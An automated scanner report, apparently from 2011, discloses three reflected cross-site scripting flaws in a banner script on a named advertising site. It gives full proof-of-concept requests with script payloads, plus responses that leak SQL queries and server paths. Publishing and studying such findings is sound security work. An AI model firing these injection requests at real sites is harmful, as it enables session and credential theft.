XSS, DORK, sharepointads.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Mar 09 12:58:56 CST 2011.


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1. Cross-site scripting (reflected)

1.1. http://sharepointads.com/members/scripts/banner.php [a_aid parameter]

1.2. http://sharepointads.com/members/scripts/banner.php [a_bid parameter]

1.3. http://sharepointads.com/members/scripts/banner.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://sharepointads.com/members/scripts/banner.php [a_aid parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sharepointads.com
Path:   /members/scripts/banner.php

Issue detail

The value of the a_aid request parameter is copied into the HTML document as plain text between tags. The payload 8f4d8<script>alert(1)</script>ee92522348d was submitted in the a_aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/scripts/banner.php?a_aid=topsharepoint8f4d8<script>alert(1)</script>ee92522348d&a_bid=0b73cb00 HTTP/1.1
Host: sharepointads.com
Proxy-Connection: keep-alive
Referer: http://www.topsharepoint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2011 00:00:20 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Content-Length: 1716
Connection: close
Content-Type: text/html

exception 'Gpf_DbEngine_NoRowException' with message 'Row does not exist: SELECT userid,refid,numberuserid,rtype,dateinserted,dateapproved,deleted,accountuserid,parentuserid,minimumpayout,payoutoption
...[SNIP]...
ata3,data4,data5,data6,data7,data8,data9,data10,data11,data12,data13,data14,data15,data16,data17,data18,data19,data20,data21,data22,data23,data24,data25 FROM qu_pap_users WHERE userid = 'topsharepoint8f4d8<script>alert(1)</script>ee92522348d' ' in /www/default/html/members/include/Compiled/Core.php:2772
Stack trace:
#0 /www/default/html/members/include/Compiled/Core.php(2755): Gpf_SqlBuilder_SelectBuilder->
...[SNIP]...

1.2. http://sharepointads.com/members/scripts/banner.php [a_bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sharepointads.com
Path:   /members/scripts/banner.php

Issue detail

The value of the a_bid request parameter is copied into the HTML document as plain text between tags. The payload 3bb44<script>alert(1)</script>8fa10d2d7ff was submitted in the a_bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/scripts/banner.php?a_aid=topsharepoint&a_bid=0b73cb003bb44<script>alert(1)</script>8fa10d2d7ff HTTP/1.1
Host: sharepointads.com
Proxy-Connection: keep-alive
Referer: http://www.topsharepoint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2011 00:00:21 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Content-Length: 1260
Connection: close
Content-Type: text/html

exception 'Gpf_DbEngine_NoRowException' with message 'Row does not exist: SELECT bannerid AS bannerid,accountid AS accountid,campaignid AS campaignid,wrapperid AS wrapperid,rtype AS rtype,rstatus AS r
...[SNIP]...
a4 AS data4,data5 AS data5,data6 AS data6,data7 AS data7,data8 AS data8,data9 AS data9,rorder AS rorder,description AS description,seostring AS seostring FROM qu_pap_banners WHERE bannerid = '0b73cb003bb44<script>alert(1)</script>8fa10d2d7ff' ' in /www/default/html/members/include/Compiled/Core.php:2772
Stack trace:
#0 /www/default/html/members/include/Compiled/Core.php(2755): Gpf_SqlBuilder_SelectBuilder->
...[SNIP]...

1.3. http://sharepointads.com/members/scripts/banner.php [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://sharepointads.com
Path:   /members/scripts/banner.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 71e15<script>alert(1)</script>edc5bad25bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/scripts/banner.php?a_aid=topsharepoint&a_bid=0b73/71e15<script>alert(1)</script>edc5bad25bccb00 HTTP/1.1
Host: sharepointads.com
Proxy-Connection: keep-alive
Referer: http://www.topsharepoint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2011 00:00:26 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Content-Length: 1261
Connection: close
Content-Type: text/html

exception 'Gpf_DbEngine_NoRowException' with message 'Row does not exist: SELECT bannerid AS bannerid,accountid AS accountid,campaignid AS campaignid,wrapperid AS wrapperid,rtype AS rtype,rstatus AS r
...[SNIP]...
data4 AS data4,data5 AS data5,data6 AS data6,data7 AS data7,data8 AS data8,data9 AS data9,rorder AS rorder,description AS description,seostring AS seostring FROM qu_pap_banners WHERE bannerid = '0b73/71e15<script>alert(1)</script>edc5bad25bccb00' ' in /www/default/html/members/include/Compiled/Core.php:2772
Stack trace:
#0 /www/default/html/members/include/Compiled/Core.php(2755): Gpf_SqlBuilder_SelectBuilder->
...[SNIP]...

Report generated by XSS.CX at Wed Mar 09 12:58:56 CST 2011.